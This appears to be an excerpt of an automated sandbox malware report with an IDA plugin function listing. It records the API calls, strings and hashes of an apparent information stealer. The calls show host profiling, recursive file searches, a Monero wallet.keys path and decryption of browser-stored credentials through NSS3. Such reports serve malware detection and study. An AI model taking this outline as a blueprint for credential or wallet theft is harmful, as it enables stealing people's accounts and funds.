Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 26c3430f1b2b4b3b3d66d316918b8f981454e2f74f62933a9651ae69249b1ca4
Instruction ID: bfb4b5f1b9039cb80dd7dba50730911997a07dcbf32a8f0727b4129fdd9c2a83
Opcode Fuzzy Hash: 26c3430f1b2b4b3b3d66d316918b8f981454e2f74f62933a9651ae69249b1ca4
Instruction Fuzzy Hash: 10E01A35A4034C6BDB91EB94CC96FAE737DAB44B01F004299BA0C5B1C0DE70AF858F91

Function 00691190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

ExitProcess.KERNEL32 ref: 006911C6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
Instruction ID: 069b4097e3ab851f671e0b413abcd8490f37df45d57493c7641bfed0db800985
Opcode Fuzzy Hash: e76d2a28ae3d136c8f20c2792a1a606400c444f8823396cc92cb39e2c875a910
Instruction Fuzzy Hash: 64E012B5E1430667CE4473F0BC0AB2A339EAB16745F24053DFA05D7602FE29EC00896E

Non-executed Functions

Function 006A38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 006A38CC
FindFirstFileA.KERNEL32(?,?), ref: 006A38E3
lstrcat.KERNEL32(?,?), ref: 006A3935
StrCmpCA.SHLWAPI(?,006B0F70), ref: 006A3947
StrCmpCA.SHLWAPI(?,006B0F74), ref: 006A395D
FindNextFileA.KERNEL32(000000FF,?), ref: 006A3C67
FindClose.KERNEL32(000000FF), ref: 006A3C7C

Strings

%s\*, xrefs: 006A38C0
%s\%s, xrefs: 006A3A6F
%s\%s, xrefs: 006A397A
%s\%s\%s, xrefs: 006A3A4A
%s%s, xrefs: 006A3AAD

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 2985ed986ac0f7624aa769eec6eb0f9b06aaea88933c27d834d85ad2538538c1
Instruction ID: 20e52f465083ef5fd0fac77f294b9d47b1ae6227ce56a8850a7838f7d2aead7f
Opcode Fuzzy Hash: 2985ed986ac0f7624aa769eec6eb0f9b06aaea88933c27d834d85ad2538538c1
Instruction Fuzzy Hash: 96A141B1A002189BDB64EFA4DC85FFA737DBB55300F044599B60D96241EB749B84CF62

Function 006A4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
wsprintfA.USER32 ref: 006A45A6
FindFirstFileA.KERNEL32(?,?), ref: 006A45BD
StrCmpCA.SHLWAPI(?,006B0FC4), ref: 006A45EB
StrCmpCA.SHLWAPI(?,006B0FC8), ref: 006A4601
FindNextFileA.KERNEL32(000000FF,?), ref: 006A468B
FindClose.KERNEL32(000000FF), ref: 006A46A0
lstrcat.KERNEL32(?,0135E838), ref: 006A46C5
lstrcat.KERNEL32(?,0135DBE0), ref: 006A46D8
lstrlen.KERNEL32(?), ref: 006A46E5
lstrlen.KERNEL32(?), ref: 006A46F6

Strings

%s\*, xrefs: 006A459A
%s\%s, xrefs: 006A461B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 8819e61a5fd93beed0c59e382033bd5a0f05ca9177eea9855eabdaf14fceaeb3
Instruction ID: 78c2baba4b163057d7d3b1660accaa0486bf134a0ce68c5b62cff82a339c8907
Opcode Fuzzy Hash: 8819e61a5fd93beed0c59e382033bd5a0f05ca9177eea9855eabdaf14fceaeb3
Instruction Fuzzy Hash: 7C5164B1900218ABCB64FBB0DC89FEA737DBB59300F404699F60996150EF74DB848F91

Function 0069ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0069ED3E
FindFirstFileA.KERNEL32(?,?), ref: 0069ED55
StrCmpCA.SHLWAPI(?,006B1538), ref: 0069EDAB
StrCmpCA.SHLWAPI(?,006B153C), ref: 0069EDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 0069F2AE
FindClose.KERNEL32(000000FF), ref: 0069F2C3

Strings

%s\*.*, xrefs: 0069ED32

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: c8096e28705876325e24c1552a74616b7e9e506a1b8cafb6d38745286980c53d
Instruction ID: 502f5b7172d0d6fee96857b944c4b31eacfaa5d7d66d16dd799ac695809d33f3
Opcode Fuzzy Hash: c8096e28705876325e24c1552a74616b7e9e506a1b8cafb6d38745286980c53d
Instruction Fuzzy Hash: CCE1DF729121189ADBD4FBA0DC52EEE737AAF55300F40419EB50B62092EF346F8ACF55

Function 0069DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006B0C2E), ref: 0069DE5E
StrCmpCA.SHLWAPI(?,006B14C8), ref: 0069DEAE
StrCmpCA.SHLWAPI(?,006B14CC), ref: 0069DEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0069E3E0
FindClose.KERNEL32(000000FF), ref: 0069E3F2

Strings

\*.*, xrefs: 0069DE26

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 8dcd22d51ad9a7c205f6418a1ff2a67c8f70c5362bb499944c87434423e5b6a6
Instruction ID: 97e306da83b2f053052211ba3f9f5359877d8f625f41c78f706a5c3ef73b0f61
Opcode Fuzzy Hash: 8dcd22d51ad9a7c205f6418a1ff2a67c8f70c5362bb499944c87434423e5b6a6
Instruction Fuzzy Hash: 23F1BF718211189ADB99FBA0CC95EEE737ABF15300F9141DEA40B62091EF346F8ACF55

Function 0069C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0069C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0069C87C
PK11_GetInternalKeySlot.NSS3 ref: 0069C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0069C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0069C8EB
lstrcat.KERNEL32(?,006B0B46), ref: 0069C943
lstrcat.KERNEL32(?,006B0B47), ref: 0069C957
PK11_FreeSlot.NSS3(?), ref: 0069C961
lstrcat.KERNEL32(?,006B0B4E), ref: 0069C978

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 8be1fba3eeb8697ad27c7b6ff629be25c1596484d852f6087ef8a0b5646c66ea
Instruction ID: c62997a564d055cd2b961931ca0895282b044268b9be48fab7a10c8e4f45d1ba
Opcode Fuzzy Hash: 8be1fba3eeb8697ad27c7b6ff629be25c1596484d852f6087ef8a0b5646c66ea
Instruction Fuzzy Hash: EE4192B590421ADFDB10DFA0DD89BFEB7B9BB48304F1042A9E509A7280D7749B84CF91

Function 00A5FB71 Relevance: 11.7, Strings: 8, Instructions: 1651COMMON

Download Yara Rule

Strings

tew, xrefs: 00A6023C
DP({, xrefs: 00A60AE2
bo~, xrefs: 00A60DEC
$Gv, xrefs: 00A60EE4
DD$u, xrefs: 00A6068A
:Ozm, xrefs: 00A60A82
j8/}, xrefs: 00A5FEB4
$Gv, xrefs: 00A60ED9

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
